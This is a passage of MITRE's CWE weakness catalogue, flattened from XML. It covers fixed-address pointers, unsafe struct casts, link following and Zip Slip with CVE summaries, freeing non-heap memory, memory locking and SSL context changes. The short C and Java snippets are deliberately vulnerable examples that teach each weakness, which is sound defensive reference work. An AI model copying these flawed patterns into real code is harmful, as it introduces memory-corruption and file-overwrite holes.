2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Explicit Call to Finalize + + + + The product sets a pointer to a specific address other than NULL or 0. + Using a fixed address is not portable, because that address will probably not be valid in all environments or platforms. + + + + + + + Indirect + + + + + + + + + + + Implementation + + + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + If one executes code at a known location, an attacker might be able to inject code there beforehand. + + + Availability + DoS: Crash, Exit, or Restart + Reduce Maintainability + Reduce Reliability + If the code is ported to another platform or environment, the pointer is likely to be invalid and cause a crash. + + + Confidentiality + Integrity + Read Memory + Modify Memory + The data at a known pointer location can be easily read or influenced by an attacker. + + + + + Implementation + Never set a pointer to a fixed address. + + + + + This code assumes a particular function will always be found at a particular address. It assigns a pointer to that address and calls the function. + + int (*pt2Function) (float, char, char)=0x08040000;int result2 = (*pt2Function) (12, 'a', 'b'); + // Here we can inject code to execute. + + + + The same function may not always be found at the same memory address. This could lead to a crash, or an attacker may alter the memory at the expected address, leading to arbitrary code execution. + + + + + INT36-C + Converting a pointer to integer or integer to pointer + Imprecise + + + SFP1 + Glitch in computation + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2006-12-15 + Draft 5 + 2006-12-15 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences, Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Common_Consequences, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Casting a non-structure type to a structure type and accessing a field can lead to memory access errors or data corruption. + + + + + + + Implementation + + + + + Integrity + Modify Memory + Adjacent variables in memory may be corrupted by assignments performed on fields after the cast. + + + Availability + DoS: Crash, Exit, or Restart + Execution may end due to a memory access error. + + + + + Requirements + The choice could be made to use a language that is not susceptible to these issues. + + + Implementation + Review of type casting operations can identify locations where incompatible types are cast. + + + + + The following example demonstrates the weakness. + + struct foo{int i;}...int main(int argc, char **argv){*foo = (struct foo *)main;foo->i = 2;return foo->i;} + + + + + + SFP7 + Faulty Pointer Use + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an API function that does not exist on all versions of the target platform. This could cause portability problems or inconsistencies that allow denial of service or other consequences. + Some functions that offer security features supported by the OS are not available on all versions of the OS in common use. Likewise, functions are often deprecated or made obsolete for security reasons and should not be used. + + + + + + Indirect + + + + + Architecture and Design + + + Implementation + + + + + Other + Quality Degradation + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Always test your code on any platform on which it is targeted to run on. + + + Testing + Test your code on the newest and oldest platform on which it is targeted to run on. + + + Testing + Develop a system to test for API functions that are not portable. + + + + + MET02-J + Do not use deprecated or obsolete classes or methods + + + SER00-J + Maintain serialization compatibility during class evolution + + + SFP3 + Use of an improper API + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2006-12-15 + Draft 5 + 2006-12-15 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Call to Limited API + + + + The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource. + + + + + + + Resultant + + + + + + + + + Soft links are a UNIX term that is synonymous with simple shortcuts on Windows-based platforms. + + + + insecure temporary file + Some people use the phrase "insecure temporary file" when referring to a link following weakness, but other weaknesses can produce insecure temporary files without any symlink involvement at all. + + + Zip Slip + "Zip slip" is an attack that uses file archives (e.g., ZIP, tar, rar, etc.) that contain filenames with path traversal sequences that cause the files to be written outside of the directory under which the archive is expected to be extracted [REF-1282]. It is most commonly used for relative path traversal (CWE-23) and link following (CWE-59). + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Confidentiality + Integrity + Access Control + Read Files or Directories + Modify Files or Directories + Bypass Protection Mechanism + An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism then an attacker may be able to bypass the mechanism. + + + Other + Execute Unauthorized Code or Commands + Windows simple shortcuts, sometimes referred to as soft links, can be exploited remotely since a ".LNK" file can be uploaded like a normal file. This can enable remote execution. + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + Separation of Privilege + + Follow the principle of least privilege when assigning access rights to entities in a software system. + Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. + + + + + + CVE-1999-1386 + Some versions of Perl follow symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack. + https://www.cve.org/CVERecord?id=CVE-1999-1386 + + + CVE-2000-1178 + Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users. + https://www.cve.org/CVERecord?id=CVE-2000-1178 + + + CVE-2004-0217 + Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile. + https://www.cve.org/CVERecord?id=CVE-2004-0217 + + + CVE-2003-0517 + Symlink attack allows local users to overwrite files. + https://www.cve.org/CVERecord?id=CVE-2003-0517 + + + CVE-2004-0689 + Window manager does not properly handle when certain symbolic links point to "stale" locations, which could allow local users to create or truncate arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2004-0689 + + + CVE-2005-1879 + Second-order symlink vulnerabilities + https://www.cve.org/CVERecord?id=CVE-2005-1879 + + + CVE-2005-1880 + Second-order symlink vulnerabilities + https://www.cve.org/CVERecord?id=CVE-2005-1880 + + + CVE-2005-1916 + Symlink in Python program + https://www.cve.org/CVERecord?id=CVE-2005-1916 + + + CVE-2000-0972 + Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. + https://www.cve.org/CVERecord?id=CVE-2000-0972 + + + CVE-2005-0824 + Signal causes a dump that follows symlinks. + https://www.cve.org/CVERecord?id=CVE-2005-0824 + + + CVE-2001-1494 + Hard link attack, file overwrite; interesting because program checks against soft links + https://www.cve.org/CVERecord?id=CVE-2001-1494 + + + CVE-2002-0793 + Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2002-0793 + + + CVE-2003-0578 + Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2003-0578 + + + CVE-1999-0783 + Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system. + https://www.cve.org/CVERecord?id=CVE-1999-0783 + + + CVE-2004-1603 + Web hosting manager follows hard links, which allows local users to read or modify arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2004-1603 + + + CVE-2004-1901 + Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles. + https://www.cve.org/CVERecord?id=CVE-2004-1901 + + + CVE-2005-1111 + Hard link race condition + https://www.cve.org/CVERecord?id=CVE-2005-1111 + + + CVE-2000-0342 + Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka "Stealth Attachment." + https://www.cve.org/CVERecord?id=CVE-2000-0342 + + + CVE-2001-1042 + FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file. + https://www.cve.org/CVERecord?id=CVE-2001-1042 + + + CVE-2001-1043 + FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file. + https://www.cve.org/CVERecord?id=CVE-2001-1043 + + + CVE-2005-0587 + Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file. + https://www.cve.org/CVERecord?id=CVE-2005-0587 + + + CVE-2001-1386 + ".LNK." - .LNK with trailing dot + https://www.cve.org/CVERecord?id=CVE-2001-1386 + + + CVE-2003-1233 + Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link + https://www.cve.org/CVERecord?id=CVE-2003-1233 + + + CVE-2002-0725 + File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file. + https://www.cve.org/CVERecord?id=CVE-2002-0725 + + + CVE-2003-0844 + Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames. + https://www.cve.org/CVERecord?id=CVE-2003-0844 + + + CVE-2015-3629 + A Libcontainer used in Docker Engine allows local users to escape containerization and write to an arbitrary file on the host system via a symlink attack in an image when respawning a container. + https://www.cve.org/CVERecord?id=CVE-2015-3629 + + + CVE-2021-21272 + "Zip Slip" vulnerability in Go-based Open Container Initiative (OCI) registries product allows writing arbitrary files outside intended directory via symbolic links or hard links in a gzipped tarball. + https://www.cve.org/CVERecord?id=CVE-2021-21272 + + + CVE-2020-27833 + "Zip Slip" vulnerability in container management product allows writing arbitrary files outside intended directory via a container image (.tar format) with filenames that are symbolic links that point to other files within the same tar file; however, the files being pointed to can also be symbolic links to destinations outside the intended directory, bypassing the initial check. + https://www.cve.org/CVERecord?id=CVE-2020-27833 + + + + File Processing + + + File or Directory + + + + Link Following + + + FIO02-C + Canonicalize path names originating from untrusted sources + + + POS01-C + Check for the existence of links when dealing with files + + + FIO01-PL + Do not operate on files that can be modified by untrusted users + CWE More Specific + + + SFP18 + Link in resource name resolution + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Link following vulnerabilities are Multi-factor Vulnerabilities (MFV). They are the combination of multiple elements: file or directory permissions, filename predictability, race conditions, and in some cases, a design limitation in which there is no mechanism for performing atomic file creation operations. + Some potential factors are race conditions, permissions, and predictability. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Applicable_Platforms, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Background_Details, Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Causal_Nature, Common_Consequences, Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Alternate_Terms, Background_Details, Observed_Examples, References, Relationship_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Link Following + Failure to Resolve Links Before File Access (aka 'Link Following') + + + + The product calls free() on a pointer to memory that was not allocated using associated heap allocation functions such as malloc(), calloc(), or realloc(). + When free() is called on an invalid pointer, the program's memory management data structures may become corrupted. This corruption can cause the program to crash or, in some circumstances, an attacker may be able to cause free() to operate on controllable memory locations to modify critical program variables or execute code. + + + + + + + Implementation + + + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Modify Memory + There is the potential for arbitrary code execution with privileges of the vulnerable program via a "write, what where" primitive. If pointers to memory which hold user information are freed, a malicious user will be able to write 4 bytes anywhere in memory. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Only free pointers that you have called malloc on previously. This is the recommended solution. Keep track of which pointers point at the beginning of valid chunks and free them only once. + + + Implementation + Before freeing a pointer, the programmer should make sure that the pointer was previously allocated on the heap and that the memory belongs to the programmer. Freeing an unallocated pointer will cause undefined behavior in the program. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, glibc in Linux provides protection against free of invalid pointers. + + + + Architecture and Design + Use a language that provides abstractions for memory allocation and deallocation. + + + Testing + Use a tool that dynamically detects memory management problems, such as valgrind. + + + + + In this example, an array of record_t structs, bar, is allocated automatically on the stack as a local variable and the programmer attempts to call free() on the array. The consequences will vary based on the implementation of free(), but it will not succeed in deallocating the memory. + + void foo(){ + record_t bar[MAX_SIZE]; + + /* do something interesting with bar */ + + ...free(bar); + } + + This example shows the array allocated globally, as part of the data segment of memory and the programmer attempts to call free() on the array. + + record_t bar[MAX_SIZE]; //Global varvoid foo(){ + + + /* do something interesting with bar */ + ...free(bar); + } + + Instead, if the programmer wanted to dynamically manage the memory, malloc() or calloc() should have been used. + + void foo(){ + record_t *bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t)); + + /* do something interesting with bar */ + + ...free(bar); + } + + Additionally, you can pass global variables to free() when they are pointers to dynamically allocated memory. + + record_t *bar; //Global varvoid foo(){ + bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t)); + + /* do something interesting with bar */ + + ...free(bar); + } + + + + + Memory + + + + MEM34-C + Only free memory allocated dynamically + Exact + + + WIN30-C + Properly pair allocation and deallocation functions + Imprecise + + + SFP12 + Faulty Memory Release + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + In C++, if the new operator was used to allocate the memory, it may be allocated with the malloc(), calloc() or realloc() family of functions in the implementation. Someone aware of this behavior might choose to map this problem to CWE-590 or to its parent, CWE-762, depending on their perspective. + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Other_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improperly Freeing Heap Memory + Free of Invalid Pointer Not on the Heap + Free of Memory not on the Heap + + + + The product stores sensitive data in memory that is not locked, or that has been incorrectly locked, which might cause the memory to be written to swap files on disk by the virtual memory manager. This can make the data more accessible to external actors. + On Windows systems the VirtualLock function can lock a page of memory to ensure that it will remain present in memory and not be swapped to disk. However, on older versions of Windows, such as 95, 98, or Me, the VirtualLock() function is only a stub and provides no protection. On POSIX systems the mlock() call ensures that a page will stay resident in memory but does not guarantee that the page will not appear in the swap. Therefore, it is unsuitable for use as a protection mechanism for sensitive data. Some platforms, in particular Linux, do make the guarantee that the page will not be swapped, but this is non-standard and is not portable. Calls to mlock() also require supervisor privilege. Return values for both of these calls must be checked to ensure that the lock operation was actually successful. + + + + + + Implementation + + + + + Confidentiality + Read Application Data + Read Memory + Sensitive data that is written to a swap file may be exposed. + + + + + Architecture and Design + Identify data that needs to be protected from swapping and choose platform-appropriate protection mechanisms. + + + Implementation + Check return values to ensure locking operations are successful. + + + + Memory + + + + A8 + Insecure Storage + CWE More Specific + + + MEM06-C + Ensure that sensitive data is not written out to disk + + + SFP23 + Exposed Data + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Memory Locking + + + + This weakness has been deprecated because it covered redundant concepts already described in CWE-287. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CWE Content Team + MITRE + 2006-12-15 + Draft 5 + 2006-12-15 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Common_Consequences, Description, Name, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Authentication Bypass Issues + + + + The product modifies the SSL context after connection creation has begun. + If the program modifies the SSL_CTX object after creating SSL objects from it, there is the possibility that older SSL objects created from the original context could all be affected by that change. + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + No authentication takes place in this process, bypassing an assumed protection of encryption. + + + Confidentiality + Read Application Data + The encrypted communication between a user and a trusted host may be subject to a sniffing attack. + + + + + Architecture and Design + Use a language or a library that provides a cryptography framework at a higher level of abstraction. + + + Implementation + Most SSL_CTX functions have SSL counterparts that act on SSL-type objects. + + + Implementation + Applications should set up an SSL_CTX completely, before creating SSL objects from it. + + + + + The following example demonstrates the weakness. + + #define CERT "secret.pem"#define CERT2 "secret2.pem" + int main(){ + SSL_CTX *ctx;SSL *ssl;init_OpenSSL();seed_prng(); + ctx = SSL_CTX_new(SSLv23_method()); + if (SSL_CTX_use_certificate_chain_file(ctx, CERT) != 1)int_error("Error loading certificate from file"); + + if (SSL_CTX_use_PrivateKey_file(ctx, CERT, SSL_FILETYPE_PEM) != 1)int_error("Error loading private key from file"); + + if (!(ssl = SSL_new(ctx)))int_error("Error creating an SSL context"); + + if ( SSL_CTX_set_default_passwd_cb(ctx, "new default password" != 1))int_error("Doing something which is dangerous to do anyways"); + + if (!(ssl2 = SSL_new(ctx)))int_error("Error creating an SSL context"); + + } + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-12-15 + Draft 5 + 2006-12-15 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + When the J2EE container attempts to write unserializable objects to disk there is no guarantee that the process will complete successfully. + In heavy load conditions, most J2EE application frameworks flush objects to disk to manage memory requirements of incoming requests. For example, session scoped objects, and even application scoped objects, are written to disk when required. While these application frameworks do the real work of writing objects to disk, they do not enforce that those objects be serializable, thus leaving the web application vulnerable to crashes induced by serialization failure. An attacker may be able to mount a denial of service attack by sending enough requests to the server to force the web application to save objects to disk. + + + + + + Indirect + + + Primary + + + + + + + + Implementation + + + + + Integrity + Modify Application Data + Data represented by unserializable objects can be corrupted. + + + Availability + DoS: Crash, Exit, or Restart + Non-serializability of objects can lead to system crash. + + + + + Architecture and Design + Implementation + All objects that become part of session and application scope must implement the java.io.Serializable interface to ensure serializability of containing objects. + + + + + In the following Java example, a Customer Entity JavaBean provides access to customer information in a database for a business application. The Customer Entity JavaBean is used as a session scoped object to return customer information to a Session EJB. + + @Entitypublic class Customer { + + private String id;private String firstName;private String 